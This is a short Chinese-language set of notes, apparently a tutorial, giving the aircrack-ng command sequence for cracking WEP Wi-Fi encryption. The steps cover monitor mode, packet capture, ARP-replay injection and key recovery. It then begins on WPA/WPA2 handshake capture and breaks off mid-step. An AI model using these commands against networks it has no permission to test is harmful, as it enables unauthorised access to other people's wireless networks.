aircrack-ng破解WEP加密
虚拟机里启用外加无线网卡
用ifconfig -a看有没有wlan0
airmon-ng start wlan0
//将网卡设置为监听模式,他会给你一个临时的适配器mon0
用airmon-ng查看自己启动的网卡名字,教程了是mon0
airodump-ng mon0
//抓包,可以找到各个wifi和BSSID等信息
airodump-ng -c 1 -w lesson01 mon0
//-c:指定信道,-w:保存你名字
airodump-ng --ivs -c 11 -w test01 mon0
//跟上一个一样,抓包 ,保存数据用于分析,但是太慢了,所以需要ARP注入攻击
//重新开一个进程
aireplay-ng -3 -b 后面接相对应的mac地址 -e 接wifi名字 --ignore-negative-one mon0
//–ignore-negative-one mon0是为了忽略负信道,这不是在ARP攻击,而是在进行ARP请求,等待别人用网,再注入攻击
//十万Frames大概就可以破解
aircrack-ng lesson01-01.ivs
//查看你有多少WEP的IVs,一般两万以上
选择AP,第一个就行:输入1回车就行
aircrack-ng破解WPA、WPA2加密
wpa加密只能通过抓取握手包暴力破解
1。将网卡设置为监听模式
airmon-ng start wlan0
2.扫描
airodump-ng mon0
3.找到目标wifi的信道ch,就